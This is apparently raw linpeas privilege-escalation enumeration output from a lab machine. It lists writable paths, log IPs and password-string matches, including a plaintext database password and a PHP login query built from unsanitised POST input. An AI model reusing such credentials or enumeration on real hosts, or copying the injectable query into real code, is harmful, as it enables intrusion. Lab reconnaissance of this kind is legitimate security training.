-rw-r--r-- 1 root root 4101 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.expr.o.cmd
-rw-r--r-- 1 root root 4807 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.lexer.lex.o.cmd
-rw-r--r-- 1 root root 5502 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.confdata.o.cmd
-rw-r--r-- 1 root root 5177 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 144 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/kconfig/.parser.tab.c.cmd
-rw-r--r-- 1 root root 3806 Feb  3 05:07 /usr/src/linux-headers-5.3.0-40-generic/scripts/.kallsyms.cmd

[1;33m[+] [1;32mReadable files inside /tmp, /var/tmp, /var/backups(limit 70)
[0m-rw-rw-r-- 1 root root 0 Jun  1 17:07 /tmp/m.txt
-rw-r--r-- 1 root root 455347 Oct 16  2019 /var/backups/dpkg.status.6.gz
-rw-r--r-- 1 root root 462899 Oct 17  2019 /var/backups/dpkg.status.5.gz
-rw-r--r-- 1 root root 252 Oct 15  2019 /var/backups/dpkg.diversions.6.gz
-rw-r--r-- 1 root root 190 Aug  5  2019 /var/backups/dpkg.statoverride.6.gz
-rw-r--r-- 1 root root 3625 Oct 19  2019 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 459787 Oct 19  2019 /var/backups/dpkg.status.4.gz
-rw-r--r-- 1 root root 252 Oct 15  2019 /var/backups/dpkg.diversions.4.gz
-rw-r--r-- 1 root root 81920 Mar 17 08:33 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 710 Oct 15  2019 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 10345 Mar 20 15:27 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 1568783 Mar 21 13:28 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 43 Oct 15  2019 /var/backups/dpkg.arch.6.gz
-rw-r--r-- 1 root root 252 Oct 15  2019 /var/backups/dpkg.diversions.3.gz
-rw-r--r-- 1 root root 3427 Oct 16  2019 /var/backups/alternatives.tar.4.gz
-rw-r--r-- 1 root root 43 Oct 15  2019 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 206 Oct 17  2019 /var/backups/dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 435437 Mar 20 15:27 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 11207 Oct 18  2019 /var/backups/apt.extended_states.5.gz
-rw-r--r-- 1 root root 302 Oct 17  2019 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 43 Oct 15  2019 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 252 Oct 15  2019 /var/backups/dpkg.diversions.5.gz
-rw-r--r-- 1 root root 10356 Mar 13 06:06 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root root 43 Oct 15  2019 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 43 Oct 15  2019 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 206 Oct 17  2019 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 429954 Oct 21  2019 /var/backups/dpkg.status.3.gz
-rw-r--r-- 1 root root 3916 Oct 22  2019 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 434021 Mar 17 08:28 /var/backups/dpkg.status.2.gz
-rw-r--r-- 1 root root 252 Oct 15  2019 /var/backups/dpkg.diversions.2.gz
-rw-r--r-- 1 root root 11265 Oct 17  2019 /var/backups/apt.extended_states.6.gz
-rw-r--r-- 1 root root 3360 Oct 15  2019 /var/backups/alternatives.tar.5.gz
-rw-r--r-- 1 root root 10325 Mar 17 08:28 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 10272 Oct 21  2019 /var/backups/apt.extended_states.4.gz
-rw-r--r-- 1 root root 43 Oct 15  2019 /var/backups/dpkg.arch.5.gz
-rw-r--r-- 1 root root 206 Oct 17  2019 /var/backups/dpkg.statoverride.5.gz
-rw-r--r-- 1 root root 11 Oct 15  2019 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 252 Oct 15  2019 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root root 206 Oct 17  2019 /var/backups/dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 93666 Mar 21 13:28 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 206 Oct 17  2019 /var/backups/dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 3631 Oct 18  2019 /var/backups/alternatives.tar.3.gz

[1;33m[+] [1;32mInteresting writable files owned by me or writable by everyone (not in Home) (max 500)
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
[0m/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/home/theseus
/run/lock
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/snap/core18/1223/run/lock
/snap/core18/1223/tmp
/snap/core18/1223/var/tmp
/snap/core18/1668/run/lock
/snap/core18/1668/tmp
/snap/core18/1668/var/tmp
/snap/core/7917/run/lock
/snap/core/7917/tmp
/snap/core/7917/var/tmp
/snap/core/8689/run/lock
/snap/core/8689/tmp
/snap/core/8689/var/tmp
/tmp
/var/crash
/var[1;31m/lib/[0mphp/sessions
/var/metrics
/var/tmp

[1;33m[+] [1;32mInteresting GROUP writable files (not in Home) (max 500)
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
[0m  Group [1;32mtheseus:
[0m/dev/mqueue/linpeas.txt
  Group [1;32musers:
[0m
[1;33m[+] [1;32mSearching passwords in config PHP files
[0m
[1;33m[+] [1;32mFinding IPs inside logs (limit 70)
[0m     86 /var/log/dpkg.log.1:6.9.7.4
     29 /var/log/dpkg.log.1:4.18.04.14
     24 /var/log/dpkg.log.1:3.5.27.1
     22 /var/log/dpkg.log.1:3.18.04.2
     21 /var/log/dpkg.log.1:4.18.04.12
     12 /var/log/dpkg.log.1:1.18.04.14
     10 /var/log/dpkg.log.1:3.18.04.1
      7 /var/log/dpkg.log.1:5.18.04.3
      7 /var/log/dpkg.log.1:1.18.04.1
      5 /var/log/dpkg.log.1:5.18.04.1
      5 /var/log/dpkg.log.1:1.18.04.11
      4 /var/log/journal/1456d592d9a64495ba5b92bdbdb0cc08/user-1000.journal:10.10.14.99
      4 /var/log/dpkg.log.1:7.18.04.2
      2 /var/log/wtmp:10.10.14.99
      1 /var/log/lastlog:10.10.14.99

[1;33m[+] [1;32mFinding passwords inside logs (limit 70)
[0mBinary file /var/log/journal/1456d592d9a64495ba5b92bdbdb0cc08/user-1000.journal matches

[1;33m[+] [1;32mFinding emails inside logs (limit 70)
[0m      1 Binary file /var/log/journal/1456d592d9a64495ba5b92bdbdb0cc08/user-1000@b09569a072514b7caf917784aef6bb3d-000000000000fc2b-0005a33ec50e1895.journal matches
      1 Binary file /var/log/journal/1456d592d9a64495ba5b92bdbdb0cc08/user-1000@b09569a072514b7caf917784aef6bb3d-000000000000a2d1-0005a0bbfeaf7e8e.journal matches
      1 Binary file /var/log/journal/1456d592d9a64495ba5b92bdbdb0cc08/user-1000@b09569a072514b7caf917784aef6bb3d-00000000000009b7-000594f1d2b2d772.journal matches

[1;33m[+] [1;32mFinding *password* or *credential* files in home (limit 70)
[0m
[1;33m[+] [1;32mFinding 'pwd' or 'passw' variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
[0m/etc/bash_completion.d/grub:__grub_mk[1;31mpassw[0md_pbkdf2_program="grub-mk[1;31mpassw[0md-pbkdf2"
/etc/nsswitch.conf:[1;31mpassw[0md:         compat systemd
/etc/pam.d/common-[1;31mpassw[0mord:[1;31mpassw[0mord	[success=1 default=ignore]	pam_unix.so obscure sha512
/etc/php/5.6/apache2/php.ini:; Define the anonymous ftp [1;31mpassw[0mord (your email address). PHP's default setting
/etc/php/5.6/cli/php.ini:; Define the anonymous ftp [1;31mpassw[0mord (your email address). PHP's default setting
/etc/php/7.3/apache2/php.ini:; Define the anonymous ftp [1;31mpassw[0mord (your email address). PHP's default setting
/etc/php/7.3/cli/php.ini:; Define the anonymous ftp [1;31mpassw[0mord (your email address). PHP's default setting
/etc/php/7.4/apache2/php.ini:; Define the anonymous ftp [1;31mpassw[0mord (your email address). PHP's default setting
/etc/php/7.4/cli/php.ini:; Define the anonymous ftp [1;31mpassw[0mord (your email address). PHP's default setting
/etc/profile.d/vte-2.91.sh:  local [1;31mpwd[0m='~'
/etc/security/namespace.init:                gid=$(echo "$[1;31mpassw[0md" | cut -f4 -d":")
/etc/security/namespace.init:        homedir=$(echo "$[1;31mpassw[0md" | cut -f6 -d":")
/etc/security/namespace.init:        [1;31mpassw[0md=$(getent [1;31mpassw[0md "$user")
/etc/ssl/openssl.cnf:challenge[1;31mPassw[0mord		= A challenge [1;31mpassw[0mord
/etc/ssl/openssl.cnf:challenge[1;31mPassw[0mord_max		= 20
/etc/ssl/openssl.cnf:challenge[1;31mPassw[0mord_min		= 4
/etc/vmware-tools/vm-support:         sed 's/[1;31mpassw[0mord[[:space:]]\+\(.*\)[[:space:]]\+\(.*\)$/[1;31mpassw[0mord \1 xxxxxx/g' > \
/home/theseus/.cache/gnome-software/odrs/ratings.json:    "io.snapcraft.terminology-mKoTrgNK6J[1;31mPWd[0mtBYOnylM3ODwj2dHH9D": {
/home/theseus/.cache/gnome-software/odrs/ratings.json:    "org.gnome.[1;31mPassw[0mordSafe": {
/home/theseus/.cache/gnome-software/odrs/ratings.json:    "org.gnome.[1;31mPassw[0mordSafe.desktop": {
/home/theseus/.cache/gnome-software/odrs/ratings.json:    "[1;31mpassw[0mord-gorilla.desktop": {
/home/theseus/.cache/gnome-software/odrs/ratings.json:    "[1;31mpassw[0mordsafe.desktop": {
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/assets/js/util.js:								case '[1;31mpassw[0mord':
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/assets/js/util.js:									.replace(/type="[1;31mpassw[0mord"/i, 'type="text"')
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/assets/js/util.js:									.replace(/type=[1;31mpassw[0mord/i, 'type=text')
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/db.php5:    private static $dbUser[1;31mPassw[0mord = 'iamkingtheseus';
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/login.php:    $[1;31mpassw[0mord = $_POST['[1;31mpassw[0mord'];
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/assets/js/util.js:								case '[1;31mpassw[0mord':
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/assets/js/util.js:									.replace(/type="[1;31mpassw[0mord"/i, 'type="text"')
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/assets/js/util.js:									.replace(/type=[1;31mpassw[0mord/i, 'type=text')
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/db.php5:    private static $dbUser[1;31mPassw[0mord = 'iamkingtheseus';
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/login.php:    $[1;31mpassw[0mord = $_POST['[1;31mpassw[0mord'];
/home/theseus/.cache/vmware/drag_and_drop/r692wf/login.php:    $[1;31mpassw[0mord = $_POST['[1;31mpassw[0mord'];
/home/theseus/.cache/vmware/drag_and_drop/r692wf/login.php:                    <td><input type="[1;31mpassw[0mord" name="[1;31mpassw[0mord" id="[1;31mpassw[0mord"></input></td>
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/assets/js/util.js:								case '[1;31mpassw[0mord':
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/assets/js/util.js:									.replace(/type="[1;31mpassw[0mord"/i, 'type="text"')
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/assets/js/util.js:									.replace(/type=[1;31mpassw[0mord/i, 'type=text')
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/db.php5:    private static $dbUser[1;31mPassw[0mord = 'iamkingtheseus';
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/login.php:    $[1;31mpassw[0mord = $_POST['[1;31mpassw[0mord'];
/home/theseus/Documents/linpeas.sh:    echo "  You can login as $USER using [1;31mpassw[0mord: $[1;31mPASSW[0mORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
/home/theseus/Documents/linpeas.sh:  FIND_[1;31mPASSW[0mORD_RELEVANT_NAMES=$(prep_to_find "$[1;31mPASSW[0mORD_RELEVANT_NAMES")
/home/theseus/Documents/linpeas.sh:  [1;31mPASSW[0mORD_RELEVANT_NAMES="*[1;31mpassw[0mord* *credential* creds*"
/home/theseus/Documents/linpeas.sh:  [1;31mPASSW[0mORDTRY=$2
/home/theseus/Documents/linpeas.sh:      SHELLUSERS=`cat /etc/[1;31mpassw[0md 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1`
/var/backups/dpkg.status.0:Depends: [1;31mpassw[0md, debconf (>= 0.5) | debconf-2.0
/var/backups/dpkg.status.0: used in a [1;31mpassw[0md like program. The idea is simple: try to prevent
/var/www/Magic/assets/js/util.js:								case '[1;31mpassw[0mord':
/var/www/Magic/assets/js/util.js:									.replace(/type="[1;31mpassw[0mord"/i, 'type="text"')
/var/www/Magic/assets/js/util.js:									.replace(/type=[1;31mpassw[0mord/i, 'type=text')
/var/www/Magic/db.php5:    private static $dbUser[1;31mPassw[0mord = 'iamkingtheseus';
/var/www/Magic/login.php:    $[1;31mpassw[0mord = $_POST['[1;31mpassw[0mord'];
/var/www/Magic/login.php:            $stmt = $pdo->query("SELECT * FROM login WHERE username='$username' AND [1;31mpassw[0mord='$[1;31mpassw[0mord'");
/var/www/Magic/login.php:                    <td><input type="[1;31mpassw[0mord" name="[1;31mpassw[0mord" id="[1;31mpassw[0mord"></input></td>

[1;33m[+] [1;32mFinding possible password variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
[0m
[1;33m[+] [1;32mFinding 'username' string inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
[0m/home/theseus/.cache/gnome-software/odrs/ratings.json:    "add-[1;31musername[0m-toppanel_brendaw.com": {
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/db.php5:    private static $db[1;31mUsername[0m = 'theseus';
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/login.php:                    <td><input type="text" name="[1;31musername[0m" id="[1;31musername[0m"></td>
/home/theseus/.cache/vmware/drag_and_drop/n9iNDE/Magic/login.php:    $[1;31musername[0m = $_POST['[1;31musername[0m'];
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/db.php5:    private static $db[1;31mUsername[0m = 'theseus';
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/login.php:                    <td><input type="text" name="[1;31musername[0m" id="[1;31musername[0m"></td>
/home/theseus/.cache/vmware/drag_and_drop/oTE2FR/Magic/login.php:    $[1;31musername[0m = $_POST['[1;31musername[0m'];
/home/theseus/.cache/vmware/drag_and_drop/r692wf/login.php:                    <td><input type="text" name="[1;31musername[0m" id="[1;31musername[0m"></td>
/home/theseus/.cache/vmware/drag_and_drop/r692wf/login.php:    $[1;31musername[0m = $_POST['[1;31musername[0m'];
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/db.php5:    private static $db[1;31mUsername[0m = 'theseus';
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/login.php:                    <td><input type="text" name="[1;31musername[0m" id="[1;31musername[0m"></td>
/home/theseus/.cache/vmware/drag_and_drop/xDY35m/Magic/login.php:    $[1;31musername[0m = $_POST['[1;31musername[0m'];
/var/www/Magic/db.php5:    private static $db[1;31mUsername[0m = 'theseus';
/var/www/Magic/login.php:            $stmt = $pdo->query("SELECT * FROM login WHERE [1;31musername[0m='$[1;31musername[0m' AND password='$password'");
/var/www/Magic/login.php:                    <td><input type="text" name="[1;31musername[0m" id="[1;31musername[0m"></td>
/var/www/Magic/login.php:    $[1;31musername[0m = $_POST['[1;31musername[0m'];

[1;33m[+] [1;32mLooking for specific hashes inside files - less false positives (limit 70)
[0m
